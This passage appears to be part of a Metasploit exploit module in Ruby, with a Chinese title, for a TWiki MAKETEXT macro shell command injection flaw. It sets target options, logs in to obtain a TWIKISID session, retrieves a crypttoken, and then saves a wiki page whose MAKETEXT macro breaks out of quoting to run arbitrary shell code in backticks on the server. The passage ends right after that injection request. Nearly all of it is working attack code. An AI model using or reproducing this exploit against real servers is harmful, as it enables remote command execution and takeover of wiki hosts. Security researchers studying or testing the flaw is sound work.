TWiki twiki/lib/TWiki.pm MAKETEXT宏任意shell命令注入漏洞(2)

register_options(
            [
                OptString.new('TARGETURI', [ true, "TWiki base path", "/" ]),
                OptString.new('TwikiPage', [ false, "TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)" ]),
                OptString.new('USERNAME', [ false,  "The user to authenticate as (anonymous if username not provided)"]),
                OptString.new('PASSWORD', [ false,  "The password to authenticate with (anonymous if password not provided)" ])
            ], self.class)
    end

def do_login(username, password)
    # Authenticate against the TWiki `do/login` endpoint and hand back the
    # session identifier the server issues.
    #
    # @param username [String] account name submitted in the login form
    # @param password [String] password submitted in the login form
    # @return [String, nil] the TWIKISID value taken from Set-Cookie when the
    #   server answers 302 with that cookie; nil on no response, any other
    #   status code, or a response without a TWIKISID cookie
    login_res = send_request_cgi(
        'method'    => 'POST',
        'uri'       => "#{@base}do/login",
        'vars_post' => {
            'username' => username,
            'password' => password
        }
    )

    # A successful login is a redirect; anything else is treated as failure.
    return nil unless login_res && login_res.code == 302

    # Only a Set-Cookie header carrying TWIKISID proves the session was created.
    cookie_match = /TWIKISID=([0-9a-f]*)/.match(login_res.headers['Set-Cookie'])
    return nil unless cookie_match

    cookie_match[1]
end

def inject_code(session, code)

vprint_status("Retrieving the crypttoken...")

res = send_request_cgi({
            'uri'      => "#{@base}do/edit#{@page}",
            'cookie'  => "TWIKISID=#{session}",
            'vars_get' =>
                {
                    'nowysiwyg' => '1'
                }
        })

if not res or res.code != 200 or res.body !~ /name="crypttoken" value="([0-9a-f]*)"/
            vprint_error("Error retrieving the crypttoken")
            return nil
        end

crypttoken = $1
        vprint_good("crypttoken found: #{crypttoken}")

if session.empty?
            if res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/
                session = $1
            else
                vprint_error("Error using anonymous access")
                return nil
            end
        end

vprint_status("Injecting the payload...")

res = send_request_cgi({
            'method'  => 'POST',
            'uri'      => "#{@base}do/save#{@page}",
            'cookie'  => "TWIKISID=#{session}",
            'vars_post' =>
            {
                'crypttoken' => crypttoken,
                'text' => "#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\'}; `#{code}`; { #\" args=\"#{rand_text_alpha(3 + rand(3))}\"}%"
            }
        })
